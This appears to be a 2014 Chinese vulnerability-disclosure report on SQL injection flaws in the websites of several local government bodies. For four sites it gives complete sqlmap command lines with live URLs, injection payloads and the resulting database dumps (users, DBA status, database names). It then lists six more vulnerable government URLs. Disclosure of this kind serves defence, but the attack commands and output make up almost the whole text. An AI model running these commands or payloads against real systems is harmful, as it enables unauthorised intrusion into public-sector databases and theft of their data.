2014-10-21: 细节已通知厂商并且等待厂商处理中 2014-10-25: 厂商已经确认,细节仅向厂商公开 2014-11-04: 细节向核心白帽子及相关领域专家公开 2014-11-14: 细节向普通白帽子公开 2014-11-24: 细节向实习白帽子公开 2014-12-05: 细节向公众公开
~~
1. 榆林机关党建网http://www.yldjw.gov.cn:88/platform/sysUser/idenUser.asp?username=admin&r=841&password=apython sqlmap.py -u "http://www.yldjw.gov.cn:88/platform/sysUser/idenUser.asp?username=admin&r=841&password=a" --is-dba --current-user --current-db --dbs --batch --threads 10sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: password Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: username=admin&r=841&password=a' AND 3302=CONVERT(INT,(SELECT CHAR(113)+CHAR(110)+CHAR(103)+CHAR(119)+CHAR(113)+(SELECT (CASE WHEN (3302=3302) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(116)+CHAR(113))) AND 'fCVO'='fCVO Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: username=admin&r=841&password=a' UNION ALL SELECT CHAR(113)+CHAR(110)+CHAR(103)+CHAR(119)+CHAR(113)+CHAR(66)+CHAR(68)+CHAR(119)+CHAR(74)+CHAR(120)+CHAR(86)+CHAR(72)+CHAR(121)+CHAR(76)+CHAR(73)+CHAR(113)+CHAR(105)+CHAR(109)+CHAR(116)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Windows 2003 or XPweb application technology: Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000current user: 'ylmo'current database: 'ylmo'current user is DBA: Falseavailable databases [7]:[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb[*] ylmo
2. 建德市住房和城乡建设局http://www.jdjs.gov.cn/components/com_vote/vote.jsp?id=0329a2307f00000101a80fb8158fb6a3python sqlmap.py -u "http://www.jdjs.gov.cn/components/com_vote/vote.jsp?id=0329a2307f00000101a80fb8158fb6a3" --is-dba --dbs --current-db --current-user --threads 10 --batchsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: infoid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: infoid=1703087AD8156AC6E5381563DE5225CD' AND 5423=5423 AND 'fWVe'='fWVe Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: infoid=1703087AD8156AC6E5381563DE5225CD' AND 7615=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(74)||CHR(122)||CHR(105),5) AND 'rUjm'='rUjm---web server operating system: Windowsweb application technology: Apache 2.2.25, JSP, JSP 2.1back-end DBMS: Oraclecurrent user: 'HNWSSP'current schema (equivalent to database on Oracle): 'HNWSSP'current user is DBA: Trueavailable databases [18]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HNGGFW[*] HNWSSP[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[*] ZJJG
3.海宁市行政服务中心http://www.hnxzsp.gov.cn/news/news_content.jsp?infoid=1703087AD8156AC6E5381563DE5225CDpython sqlmap.py -u "http://www.hnxzsp.gov.cn/news/news_content.jsp?infoid=1703087AD8156AC6E5381563DE5225CD" --is-dba --dbs --current-db --current-user --threads 10 -D HNWSSP --tablessqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: infoid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: infoid=1703087AD8156AC6E5381563DE5225CD' AND 5423=5423 AND 'fWVe'='fWVe Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: infoid=1703087AD8156AC6E5381563DE5225CD' AND 7615=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(74)||CHR(122)||CHR(105),5) AND 'rUjm'='rUjm---web server operating system: Windowsweb application technology: Apache 2.2.25, JSP, JSP 2.1back-end DBMS: Oraclecurrent user: 'HNWSSP'current schema (equivalent to database on Oracle): 'HNWSSP'current user is DBA: Trueavailable databases [18]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HNGGFW[*] HNWSSP[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[*] ZJJG
4. 嘉善县公共资源交易中心http://60.12.186.79/TSPB/web/news/Content.jsp?infoId=E53DA8CD676874026AA81CDB77F32380&PUBTYPE=10python sqlmap.py -u "http://60.12.186.79/TSPB/web/news/Content.jsp?infoId=E53DA8CD676874026AA81CDB77F32380&PUBTYPE=10" --is-dba --dbs --current-db --current-user --threads 10 --batchsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: infoId Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: infoId=464CC653138FB29C89F9A5B416DCF6F7' AND 3857=3857 AND 'VWFt'='VWFt&PUBTYPE=20 Type: UNION query Title: Generic UNION query (NULL) - 19 columns Payload: infoId=-7210' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(119)+CHAR(112)+CHAR(105)+CHAR(113)+CHAR(106)+CHAR(72)+CHAR(75)+CHAR(70)+CHAR(71)+CHAR(85)+CHAR(70)+CHAR(97)+CHAR(120)+CHAR(114)+CHAR(113)+CHAR(99)+CHAR(111)+CHAR(121)+CHAR(113),NULL,NULL,NULL-- &PUBTYPE=20 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: infoId=464CC653138FB29C89F9A5B416DCF6F7'; WAITFOR DELAY '0:0:5'--&PUBTYPE=20 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: infoId=464CC653138FB29C89F9A5B416DCF6F7' WAITFOR DELAY '0:0:5'--&PUBTYPE=20---web application technology: JSPback-end DBMS: Microsoft SQL Server 2000current user: 'xkfglxt'current database: 'JsZjPb'current user is DBA: Falseavailable databases [9]:[*] jsWeb[*] JsZjPb[*] JsZjPbTest[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb
其他的类似,就不贴了5.http://www.jszbw.com/TSPB/web/news/Content.jsp?infoId=DD3C97E42420A40CE784EC4BC501D68D&PUBTYPE=96.http://www.jsspzx.gov.cn/JsWeb/news/ShowContent.jsp?infoId=B33A32A78114576C49582DA3BC5ED2317.http://spfwzx.zjwjj.gov.cn/wjjspfwzx/web/news/news_content.jsp?infoId=4EF8B41B329393AA3FC33695C577AE648.http://www.jxedzsp.gov.cn/jxkfqglxt/web/news/news_content.jsp?infoId=BE85AEA774AEEACD2029E1906FD844179.http://www.xzxzsp.gov.cn/SZ_SPWEB/ser_newinfocontent?InfoID=81752F10-28AE-4C11-A21E-14298777C1D6&action=dynamic&Type=110.http://www.hnxzfw.gov.cn/news/news_content.jsp?infoid=48DD3724883FF4EA0FC1F6F77F0DE760
危害等级:高
漏洞Rank:13
确认时间:2014-10-25 23:48
暂无